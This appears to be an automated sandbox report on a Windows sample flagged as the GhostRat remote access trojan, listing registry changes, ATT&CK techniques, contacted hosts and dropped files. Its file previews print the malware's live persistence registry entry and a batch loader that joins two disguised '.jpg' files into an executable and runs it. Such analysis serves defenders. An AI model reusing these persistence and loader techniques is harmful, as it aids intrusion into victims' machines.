Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	1 Process Injection	11 Masquerading	1 Input Capture	11 Security Software Discovery	Remote Services	1 Input Capture	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	11 Modify Registry	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Process Injection	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Source	Detection	Scanner	Label	Link
https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar	0%	Avira URL Cloud	safe

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Downloads\?????\20250108.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
s3-r-w.ap-northeast-1.amazonaws.com	3.5.157.163	true	false	unknown
www.google.com	216.58.206.68	true	false	high
bx-9999.bx-msedge.net	150.171.73.254	true	false	unknown
ow1.res.office365.com	unknown	unknown	false	unknown
tom18860.s3.ap-northeast-1.amazonaws.com	unknown	unknown	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.78	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
216.58.212.142	unknown	United States	15169	GOOGLEUS	false
74.125.133.84	unknown	United States	15169	GOOGLEUS	false
216.58.206.35	unknown	United States	15169	GOOGLEUS	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
206.238.196.227	unknown	United States	174	COGENT-174US	false
23.56.254.164	unknown	United States	42961	GPRS-ASZAINKW	false
142.250.184.227	unknown	United States	15169	GOOGLEUS	false
3.5.157.163	s3-r-w.ap-northeast-1.amazonaws.com	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585773
Start date and time:	2025-01-08 08:48:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.evad.win@31/22@5/111

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.35, 216.58.212.142, 74.125.133.84
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8168124560486189
Encrypted:	false
SSDEEP:
MD5:	4C713426D251F816FB10A9843ABEEA3E
SHA1:	6985FAAA635EE48F929046F51CA6C352D60ACF6C
SHA-256:	E19855722ED347D6A3C93C3F77298219E9ABC92F3BC00B7A3BA78D32F6F0C3DC
SHA-512:	8BF12DB5B8F984517A784483259FD4DE36A6700423CCBFAE883698DC381FD09C9588F3408E2821EFFB443151EB78AFA45F16C23B011E53F4B3A566B328143D8A
Malicious:	false
Reputation:	unknown
Preview:	..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08082615193441502
Encrypted:	false
SSDEEP:
MD5:	2547EB3DB34AC4C49A2FB0BEE7FFD90A
SHA1:	E9B126CE598B2A94D5F3962F334E027C6BB0036E
SHA-256:	7B2652D8D73669B15C4C4584B15FCC6D9FA77FC032C25021866001EBF46CA644
SHA-512:	A9C9EF85179FE485BBAA6704B7E743C6395257E2203A634787123055A3995F7891DB3045D5817E5AB64F85581451D7651739216BE75E6AB30E32F4C082E9F49F
Malicious:	false
Reputation:	unknown
Preview:	@..^.....................................;...{..'0...}... ...{........... ...{... ...{..#.#.. ...{.\|...................'0...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Documents\1.jpg

Download File

Process:	C:\Users\user\Downloads\????\?????\20250108.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:
MD5:	1C8C462CFA2D16D7337195BB6FA32E71
SHA1:	E2FBDEFE0271B315BBA443EE35781C743DFD01E7
SHA-256:	6A7319487AA2B05AF6B2426B0C3A1F1E57E69D7D032A4DC0D44118C9D42EDA61
SHA-512:	E11DFDD3A971F6ED86D4D3E19A68E19F8F9F41C473BE2A00487334F0FB395177BA34448C2B4816DA76171D3E36B05CBAC77E3F9C796848A77138B71538C864E7
Malicious:	false
Reputation:	unknown
Preview:	MZ?

C:\Users\Public\Documents\1.reg

Download File

Process:	C:\Users\user\Downloads\????\?????\20250108.exe
File Type:	Windows Registry text (Win2K or above)
Category:	dropped
Size (bytes):	190
Entropy (8bit):	5.118032222537647
Encrypted:	false
SSDEEP:
MD5:	1DF74E42115B9CA66796B7E7266A688A
SHA1:	E605F90249F7EE51BAFE9D63347DDFABA008802D
SHA-256:	01F8FF102EB4A9C952D97D58998F111086BEEF2A5C9EA9597BDFA1851D2F12C8
SHA-512:	869D9B8B56CBEF0854FFDCD847DFE4841F2C477D341C0239A493DB827CABA4255A601F9B00E48C42BB6B47FE89DA946A2E5380369BCE56354D51E8B3126B3E10
Malicious:	true
Reputation:	unknown
Preview:	Windows Registry Editor Version 5.00....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."UserInitMprLogonScript"="C:\\Users\\Public\\Documents\\update.bat"

C:\Users\Public\Documents\2.jpg

Download File

Process:	C:\Users\user\Downloads\????\?????\20250108.exe
File Type:	data
Category:	dropped
Size (bytes):	58365
Entropy (8bit):	5.927089418899037
Encrypted:	false
SSDEEP:
MD5:	928591B0ED5A0CC5D78E814620F1A768
SHA1:	C765B8D4D053737B92980DAAD545669D0E1D5F70
SHA-256:	092378413753EF981867BF24AE56826D15E2870A8DC05A025C0B16B5CE013A9F
SHA-512:	9DFA7A4955EDC5693ABAEAC9DC0D5A234D5C87D4A3C2FCEF9A09A5AD9FE1C2D0BEFB78C42BC6D8B81FF680AED89B1EAE1BC628D7B717C6657D0BCE24B9317099
Malicious:	false
Reputation:	unknown
Preview:	.....................@...............................................!..L.!This program cannot be run in DOS mode....$........[{o.:.<.:.<.:.<.h.<.:.<.h.<.:.<..n<.:.<.:.<.:.<.h.<.:.<.h.<.:.<Rich.:.<................PE..d...{.zg.........."..........j.................@.............................@............@.................................................(...<............ ...............0..........................................................X............................text.............................. ..`.rdata...&.......(..................@..@.data....4..........................@....pdata....... ......................@..@.reloc.......0......................@..B...................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Documents\upda.txt

Download File

Process:	C:\Users\user\Downloads\????\?????\20250108.exe
File Type:	data
Category:	dropped
Size (bytes):	169472
Entropy (8bit):	5.209109938757547
Encrypted:	false
SSDEEP:
MD5:	151531CE14F3D4CB7BE58B912696C681
SHA1:	69B9CE50576AB667A5861B8CB7C8F440685F67F9
SHA-256:	3AD8CE4BFFEAFBC3C7CBBE226C2E57DFEC6A6D34D91E605106B33755C7AEF237
SHA-512:	D0F13759CE69C8199A3499F28449C1F766A827F3AFAAACFA234F86340907E52B65F06814863DCE9C7C9DFE2BFB4EDB61522F6142766905826D34FA62D5018143
Malicious:	false
Reputation:	unknown
Preview:	XOPG.....L]...]..]......................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1..........CS.r.S.r.S.r.<...>.r.<...X.r.<...~.r.Z...X.r.S.s..r.<...^.r.<...R.r.G\|v}S.r.........................EP..q....kLp..........7......}..........a..........U....................................}.....U.................................................=...m....e.......E..m.......................................................................-...........................;apma....e.......e..................5..u;gqtat...u.......u..................U..U;qtat....e.......e..................U...;eqtat...5...E...5...E..............U..U;gfgv........e.......e..............U..U;gpyzv..............................U..W........................................................................................................................................................................................................................................................................

C:\Users\Public\Documents\update.bat

Download File

Process:	C:\Users\user\Downloads\????\?????\20250108.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.894035329095596
Encrypted:	false
SSDEEP:
MD5:	4B85C6C0CCF6D4A3E91F12B471763BD9
SHA1:	0E3C79447FF2DA26E52815B07F3347DAFF4983FD
SHA-256:	5EC5A76ADE15C6214C763A63DDAC8D9E3442535001714207E5A454432AE1328D
SHA-512:	246455B4865C77EAA58D4E8DF24131800115AD2F18D5F77C70E8353C5922F340CFBD7A88BEA1FF0C85137C32E7D8D217669F8D7A89258941713C829929C2C1C8
Malicious:	true
Reputation:	unknown
Preview:	@echo off..copy /b "C:\Users\Public\Documents\1.jpg" + "C:\Users\Public\Documents\2.jpg" "C:\Users\Public\Documents\SkyOption.exe"..start "" "C:\Users\Public\Documents\SkyOption.exe"..exit..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11887
Entropy (8bit):	4.901437212034066
Encrypted:	false
SSDEEP:
MD5:	ED30A738A05A68D6AB27771BD846A7AA
SHA1:	6AFCE0F6E39A9A59FF54956E1461F09747B57B44
SHA-256:	17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
SHA-512:	183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqr4ubdv.yqs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	5.122331048887613
Encrypted:	false
SSDEEP:
MD5:	B40370148B458AD861897AB6E74D66B9
SHA1:	67C5803668AFCD3C80DCFF9B46408627ACDBDCCE
SHA-256:	5E73587FEFFE6A18EB66D92360644DEE446B13C92B7997E07AC6E761A3E42FC7
SHA-512:	360D444B5F1B3CAAD984D945704DEBCAF2F6CCD1206BA244BE1C19525AED5594F7F129B7029388B48EAE5A333178795E06D551DF58576A08508E0021EF1D50FB
Malicious:	false
Reputation:	unknown
Preview:	cd C:\Users\user\Downloads\..cd .\.....\..ls..get-filehash .\20250108.exe..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	35E1CC22F0F12DD15CC1FB34999CC2B3
SHA1:	AF0985022CA8E8460976CB741C3523B71DBFC9CC
SHA-256:	EBB1797758095C0DA2C50DEC7B6E990C6DFC8046E6A311698F3C573B52B5C4DB
SHA-512:	BF92F935FFE9A4333D7B0C050536CC36827CB589129B2A2C22FE1B38D40F5EFAD82DB6D5B10308863C1D851FDCA4D051C57A22A9340F3A6A708FBE2450318F2C
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ......{4...Q>D.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...6.O..a....D.a......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H(Z.>..............................A.p.p.D.a.t.a...B.V.1.....(Z.>..Roaming.@......FW.H(Z.>...........................V..R.o.a.m.i.n.g.....\.1.....(Z.>..MICROS~1..D......FW.H(Z.>...........................D.M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.H(Z.>..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H(Z.>....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....(Z.>..Programs..j......FW.H(Z.>....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H(Z.>..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H(Z1>....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SO4S13NB6V6I7YQ3E5SL.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5440
Entropy (8bit):	3.9448691697893254
Encrypted:	false
SSDEEP:
MD5:	35E1CC22F0F12DD15CC1FB34999CC2B3
SHA1:	AF0985022CA8E8460976CB741C3523B71DBFC9CC
SHA-256:	EBB1797758095C0DA2C50DEC7B6E990C6DFC8046E6A311698F3C573B52B5C4DB
SHA-512:	BF92F935FFE9A4333D7B0C050536CC36827CB589129B2A2C22FE1B38D40F5EFAD82DB6D5B10308863C1D851FDCA4D051C57A22A9340F3A6A708FBE2450318F2C
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ......{4...Q>D.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...6.O..a....D.a......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H(Z.>..............................A.p.p.D.a.t.a...B.V.1.....(Z.>..Roaming.@......FW.H(Z.>...........................V..R.o.a.m.i.n.g.....\.1.....(Z.>..MICROS~1..D......FW.H(Z.>...........................D.M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.H(Z.>..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H(Z.>....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....(Z.>..Programs..j......FW.H(Z.>....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H(Z.>..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H(Z1>....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.988247671586456
Encrypted:	false
SSDEEP:
MD5:	BE3A83941BEF3A25FB0A08F3A8015D22
SHA1:	470AC457A648768F8ACFEE4175F352A99D91854B
SHA-256:	30B7856786CC72480F4E1EF3568DC96D4F8F1B452D69ED499CBE27A103EF5092
SHA-512:	D7055E1313E55951FC401C6CA793B8A8B8DA8860464094F7A39D5D99E3DDDC7DBC3C46C2CB70CF8671C9E099D1404283D191D36E79C4AB1E78AA0E5C4F74D691
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....Z....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.005608023745956
Encrypted:	false
SSDEEP:
MD5:	9EF668CD03051C11352FE63D6093BA1E
SHA1:	0D446F9DA600B47C55E55F2E1439C8B3B10882ED
SHA-256:	9D18279B206CD51C67D6DD039B1C1D7969D51DE715545F3A1CFEC708B912ABC2
SHA-512:	24BEB0D2313CE34AC56F8092A70EBF59C118E966851A183591D0B579C3D1ACBCE87C1D57B7ED9CC2CF0E4F8CB4E4E0410400DC6D16FB2DDA2F9BA2B440D2A58F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....J...a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.002788148013199
Encrypted:	false
SSDEEP:
MD5:	D0E7A39456FD037FEBE5E3DD9B3CC98A
SHA1:	AC134E8AC01078E42EF17BE614D52DF5B3F4C036
SHA-256:	DAE786004E171E3D1389308C568405D1FA16F0DC9615F0A1BD6EC729436F0455
SHA-512:	63CBF933FC45F786A3A81D4D98EE0857241B50660E0AF3557457C2A5A9309C79492ADEDD24B3A0BC00B89AAFC3B9B69A61EB231BA3D98B932A03709EDBE3664A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.993421443684064
Encrypted:	false
SSDEEP:
MD5:	EA4D03B2F4C15CC488B79F701CE416B8
SHA1:	E8925F6004559154E09EC8D52563F3DC28DE6541
SHA-256:	106BE4FFF83B656DCD0A99606BBC2D0FB8E054F3570D41FCCBA8A780E0E4C8EC
SHA-512:	8C70D8263A0A1CDC0AAB2757001B76F75C3413797246DF119482A4497463C6298E02B6A74526568DB99FDE3A0995F8B4DA4695099EE1CE379C48087EC1CDA943
Malicious:	false
Reputation:	unknown
